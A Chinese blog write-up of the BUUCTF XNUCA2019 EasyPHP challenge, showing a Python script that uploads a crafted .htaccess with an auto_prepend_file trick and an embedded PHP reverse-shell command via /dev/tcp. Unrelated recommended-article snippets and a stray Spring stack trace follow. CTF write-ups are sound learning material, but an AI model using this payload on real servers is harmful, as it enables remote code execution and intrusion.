BUUCTF:[XNUCA2019Qualifier]EasyPHP -- 关于.htaccess 的各种配置操作,

最新推荐文章于 2023-04-10 12:01:54 发布
原创 最新推荐文章于 2023-04-10 12:01:54 发布 · 1.6k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #web

这篇博客主要探讨了在BUUCTF的XNUCA2019Qualifier挑战中遇到的EasyPHP问题,涉及.htaccess文件的配置、上传及解析错误。作者分享了在Python上传.htaccess文件时需要注意的转义字符、注释符问题,以及通过查看Apache错误日志定位错误的方法。此外,还讨论了PHP正则匹配的绕过技巧和preg_match()的回调次数限制。 
import requests

url = 'http://02cdf9ef40d440d1bd0ba727da4b348c21ce0e526eea4fad.changame.ichunqiu.com/'
payload = '?filename=.htaccess&content=php_value%20auto_prepend_fi\\%0Ale%20".htaccess"\n%23<?php system(\'bash -c "/bin/bash -i >%26 /dev/tcp/ip/port 0<%261"\');?>\\'
url2 = url + payload
r = requests.get(url2)
req = request.get(url)

python 方法:

参考的文章,看最下面的那两篇就是了
总体:
这些方法看起来很棒,其实我感觉这都是参赛者当时 细心看PHP文档才发现的,而我辈现在直接看他们的现成的东西,如此巧妙的方法之下,是大佬们细心找到的bug点,其实真正应该习得的是认真看文档的能力,从很多的配置信息中找到我们能够利用的 点这个才是真正的能力

一、自己做:

做个毛,做,这个题是我能做出来的???
没有个数,看WP去,,

这个 正则,文件名开头不能是 字母开头,又不能是数字,那就只能够是.了啊,再看一下黑名单???防止马的黑名单是这个吗??

没见过的黑名单,那就是上传.htaccess了啊,

二、学到的&&不足:

1. python 上传.htaccess时的\问题

注意在用python传入的时候,这个用一个\,是不行的,在python中的\和Linux中的一样也是 连接两行的意思,
在这里插入图片描述我们这里需要两个\\,这样转义一下,才行

最低0.47元/天 解锁文章
[XNUCA2019Qualifier]EasyPHP.htaccess的利用。
snowlyzz的博客
08-30 560
.htaccess配置文件设置
【复习】BUUCTF:[GXYCTF2019]BabyUpload --.htaccess的 包含自己和解析图片马为php文件都可以的 。。也算easy
Zero_Adam的博客
04-19 1330
一、自己做: 只需要更改Content-Type就能够绕过了,但是好像对文件内容有过滤。 那么,不能有? ,看看PHP的版本,看看能够用html的script进行绕过 能成功,看看能否解析。
ByteCTF_2019&XNUCA_2019部分web题复现
Lethe's Blog
09-11 5233
EzCMS 1、扫描目录有www.zip,下载得到源码。 整个题目的功能如下: index.php页面验证登陆,可以任意账号登陆到upload.php上传页面,但是只有admin账号才能进行文件上传。 访问了upload.php·,就会在沙盒下生成一个.htaccess文件,内容为:lolololol, i control all。 上传文件后,会返回文件的存储路径,view details可以...
[XNUCA2019Qualifier]EasyPHP
fmyyy1的博客
05-13 1031
文章目录非预期解一 <?php $files = scandir('./'); foreach($files as $file) { if(is_file($file)){ if ($file !== "index.php") { unlink($file); } } } include_once("fl3g.php"); if(!isset($_G
[XNUCA2019Qualifier]HardJS
woshilnp的博客
09-13 741
[XNUCA2019Qualifier]HardJS 知识点: node.js原型链污染 node.js代码审计 解题: 分析 server.js: 使用的 express 这个框架,模板渲染引擎用的 ejs 。路由如下: / 首页 /static 静态文件 /sandbox 显示用户HTML数据用的沙盒 /login 登陆 /register 注册 /get json接口 获取数据库中保存的数据 /add 用户添加数据的接口 发现调用了 lodash ,而且版本较低,估计存在原型链污染漏洞,发现调用
BUUCTF-.htaccess-sql.fuzz-D盾
m0_64180167的博客
04-10 776
第七周。
精选资源
hbase-2.4.11-bin.tar.gz
04-19
在HBase中,数据存储在表中,每个表由行键(Row Key)、列族(Column Family)、列限定符(Column Qualifier)和时间戳(Timestamp)四部分组成。这种结构使得HBase非常适合处理大规模稀疏数据集。 HBase的2.4.11...
hbase-2.2.5-bin.tar.gz
11-19
对于Linux和Windows平台,HBase的安装和运行是跨平台的,这使得它在各种操作系统环境下都能得到广泛应用。 1. **HBase架构**: - **Region Server**:存储和处理数据的主要节点,每个Region Server负责一部分表的...
hbase-1.1.2-bin.tar.gz
01-14
行由行键(Row Key)唯一标识,列则由列族(Column Family)和列限定符(Qualifier)定义。列族是预定义的一组列的集合,而列限定符用于区分同一列族内的不同列。这种结构使得HBase能够高效地存储和检索大规模稀疏...
[BUUCTF][MRCTF2020]部分web wp
cosmoslin的博客
10-11 844
[MRCTF2020]你传你????呢 学习链接:[CTF].htaccess的使用技巧总结 fuzz测试,发现过滤了php后缀,中间件是apache,可以上传png图片马。 思路:利用.htaccess来将png文件当作php文件解析 先上传.htaccess文件,文件解析 AddType application/x-httpd-php .png 然后再上传一个png图片马 最后用蚁剑连接就可以啦! [MRCTF2020]Ez_bypass include 'flag.php'; $flag='MR
BUU CTF web(四)
0xdawn的博客
05-11 8189
[HarekazeCTF2019]encode_and_encode <?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_valid($str) { $banword = [ // no path traversal '\.\.', // no stream wrapper '(php|file|glob
buu刷题(4)
qq_62046696的博客
03-22 666
题目中只限制了 F I L E S [ f i l e ] ∗ ∗ 的上传后缀,也只给出 ∗ ∗ _FILES[file]** 的上传后缀,也只给出 ** FILES[file]∗∗的上传后缀,也只给出∗∗_FILES[file] 上传后的路径,那我们上传多文件就可以绕过。人傻了,上面的思路全部错掉,上面输入的filename文件,其实是没有权限执行php代码的,这点我们可以通过phpinfo();所以我们的恶意代码先执行。也是通过报错推断出过滤了{{而没用过滤{,这里我用的是{%3*3%}发现回显的是,
[ISITDTU 2019]EasyPHP异或绕过
Aiwin的博客
08-24 766
[ISITDTU 2019]EasyPHP count_chars()函数异或绕过
[ISITDTU 2019]EasyPHP
m0_62905261的博客
10-04 1904
[ISITDTU 2019]EasyPHP
BUUCTF】刷题总结(基础篇)
weixin_51614272的博客
05-15 2608
目录[GXYCTF2019]Ping Ping Ping[极客大挑战 2019]Upload[极客大挑战 2019]BabySQL[ACTF2020 新生赛]Upload[极客大挑战 2019]BuyFlag[ACTF2020 新生赛]BackupFile[BJDCTF2020]Easy MD5[RoarCTF 2019]Easy Calc[HCTF 2018]admin[MRCTF2020]你传你🐎呢 [GXYCTF2019]Ping Ping Ping 知识点:命令执行 绕过: ; 来拼接命令 $I
BUUCTF_Web题目题解记录1
Altering_Ji的博客
07-11 3026
记录一下buu 刷题网站上最近做的三道web题目:[GYCTF2020]Blacklist(堆叠注入)、[网鼎杯 2020 青龙组]AreUSerialz(反序列化)、[GXYCTF2019]BabyUpload(文件上传)
i春秋网络内生安全试验场CTF夺旗赛(第二季)部分wp
qq_42188168的博客
10-26 1078
i春秋 2019-10月CTF答题夺旗赛 web部分wp 1.easyphp 通过观察可以发现img传参base64解码;同样的方法可得index.php源码 之后构造序列化。。。。。 2、calculate1,2 写wp前删掉了脚本,简述下:利用selenium运算公式并结合chromedriver进行10次提交 3、babysql 之后测试admin’orderby 1# 到3,直到4...
BUUCTF刷题记录(6)
bmth666的博客
05-14 7881
文章目录web[FBCTF2019]RCEService web 打ctf(×) 被ctf打(√) [FBCTF2019]RCEService 首先查看文件夹文件,{"cmd":"ls"} 然后输入其他的发现被ban了,看wp得源码 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { ...
原始问题如下:org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'a2AExample' defined in file [D:\java_space\springAI-alibaba-a2a\demo1\target\classes\com\alibaba\cloud\ai\examples\documentation\framework\advanced\a2a\A2AExample.class]: Unsatisfied dependency expressed through constructor parameter 0: No qualifying bean of type 'org.springframework.ai.chat.model.ChatModel' available: expected at least 1 bean which qualifies as autowire candidate. Dependency annotations: {@org.springframework.beans.factory.annotation.Qualifier("dashscopeChatModel")} at org.springframework.beans.factory.support.ConstructorResolver.createArgumentArray(ConstructorResolver.java:804) ~[spring-beans-6.2.12.jar:6.2.12] at org.springframework.beans.factory.support.ConstructorResolver.autowireConstructor(ConstructorResolver.java:240) ~[spring-beans-6.2.12.jar:6.2.12] at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.autowireConstructor(AbstractAutowireCapableBeanFactory.java:1395) ~[spring-beans-6.2.12.jar:6.2.12] at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBeanInstance(AbstractAutowireCapableBeanFactory.java:1232) ~[spring-beans-6.2.12.jar:6.2.12] at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:569) ~[spring-beans-6.2.12.jar:6.2.12] at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:529) ~[spring-beans-6.2.12.jar:6.2.12] at org.springframework.beans.factory.support.AbstractBeanFactory.lambda$doGetBean$0(AbstractBeanFactory.java:339) ~[spring-beans-6.2.12.jar:6.2.12] at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:373) ~[spring-beans-6.2.12.jar:6.2.12] at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:337) ~[spring-beans-6.2.12.jar:6.2.12] at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:202) ~[spring-beans-6.2.12.jar:6.2.12] at org.springframework.beans.factory.support.DefaultListableBeanFactory.instantiateSingleton(DefaultListableBeanFactory.java:1228) ~[spring-beans-6.2.12.jar:6.2.12] at org.springframework.beans.factory.support.DefaultListableBeanFactory.preInstantiateSingleton(DefaultListableBeanFactory.java:1194) ~[spring-beans-6.2.12.jar:6.2.12] at org.springframework.beans.factory.support.DefaultListableBeanFactory.preInstantiateSingletons(DefaultListableBeanFactory.java:1130) ~[spring-beans-6.2.12.jar:6.2.12] at org.springframework.context.support.AbstractApplicationContext.finishBeanFactoryInitialization(AbstractApplicationContext.java:990) ~[spring-context-6.2.12.jar:6.2.12] at org.springframework.context.support.AbstractApplicationContext.refresh(AbstractApplicationContext.java:627) ~[spring-context-6.2.12.jar:6.2.12] at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.refresh(ServletWebServerApplicationContext.java:146) ~[spring-boot-3.5.7.jar:3.5.7] at org.springframework.boot.SpringApplication.refresh(SpringApplication.java:752) ~[spring-boot-3.5.7.jar:3.5.7] at org.springframework.boot.SpringApplication.refreshContext(SpringApplication.java:439) ~[spring-boot-3.5.7.jar:3.5.7] at org.springframework.boot.SpringApplication.run(SpringApplication.java:318) ~[spring-boot-3.5.7.jar:3.5.7] at org.springframework.boot.SpringApplication.run(SpringApplication.java:1361) ~[spring-boot-3.5.7.jar:3.5.7] at org.springframework.boot.SpringApplication.run(SpringApplication.java:1350) ~[spring-boot-3.5.7.jar:3.5.7] at com.alibaba.cloud.ai.examples.documentation.framework.advanced.a2a.DocumentationApplication.main(DocumentationApplication.java:41) ~[classes/:na] Caused by: org.springframework.beans.factory.NoSuchBeanDefinitionException: No qualifying bean of type 'org.springframework.ai.chat.model.ChatModel' available: expected at least 1 bean which qualifies as autowire candidate. Dependency annotations: {@org.springframework.beans.factory.annotation.Qualifier("dashscopeChatModel")} at org.springframework.beans.factory.support.DefaultListableBeanFactory.raiseNoMatchingBeanFound(DefaultListableBeanFactory.java:2314) ~[spring-beans-6.2.12.jar:6.2.12] at org.springframework.beans.factory.support.DefaultListableBeanFactory.doResolveDependency(DefaultListableBeanFactory.java:1733) ~[spring-beans-6.2.12.jar:6.2.12] at org.springframework.beans.factory.support.DefaultListableBeanFactory.resolveDependency(DefaultListableBeanFactory.java:1653) ~[spring-beans-6.2.12.jar:6.2.12] at org.springframework.beans.factory.support.ConstructorResolver.resolveAutowiredArgument(ConstructorResolver.java:913) ~[spring-beans-6.2.12.jar:6.2.12] at org.springframework.beans.factory.support.ConstructorResolver.createArgumentArray(ConstructorResolver.java:791) ~[spring-beans-6.2.12.jar:6.2.12] ... 21 common frames omitted
最新发布
12-03
然后启动应用,查看日志中是否有关于DashScope自动配置的信息。 4. 如果使用了代理,可以在配置文件中添加代理设置: ```properties spring.ai.dashscope.proxy.host=your-proxy-host spring.ai.dashscope....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值